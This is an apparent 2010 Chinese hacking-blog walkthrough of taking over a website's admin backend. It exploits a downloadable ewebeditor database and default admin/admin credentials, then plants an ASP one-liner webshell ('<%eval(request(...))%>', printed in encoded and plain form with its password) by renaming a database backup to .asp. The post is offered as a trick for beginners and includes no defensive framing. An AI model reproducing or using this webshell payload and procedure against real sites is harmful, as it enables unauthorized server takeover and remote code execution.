后台巧妙拿webshell

2010, August 28, 10:17 PM. 黑友网文
Submitted by admin

作者:wjs qq825680101

     菜菜可以恶补下

 

朋友发了个后台让帮忙拿shell,图1

大小: 24.82 K
尺寸: 500 x 223
浏览: 61 次
点击打开新窗口浏览全图

现看了上传有ewebeditor编辑器,默认数据库db/ewebeditor.mdb能下载。管理员名字和密码都是admin,但是后台找不到也没找人前人入侵过的痕迹,不然可以修改样式上传。

 

看到数据库备份,备份文件不能修改,备份名字可以修改。图2

大小: 32.32 K
尺寸: 429 x 280
浏览: 41 次
点击打开新窗口浏览全图

之前入侵过这样的后台,拿shell方法是在管理员那插入一句,话图3

大小: 24.61 K
尺寸: 461 x 259
浏览: 42 次
点击打开新窗口浏览全图

一句话是编码过的┼癥污爠煥敵瑳∨浴≤┩>
<%eval(request("tmd"))%>
密码 tmd

 

然后数据库备份1.asp,右键属性就看到数据库路径。

用一句话连接。图4

大小: 13.22 K
尺寸: 253 x 120
浏览: 48 次
点击打开新窗口浏览全图

结束

Tags: 后台

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):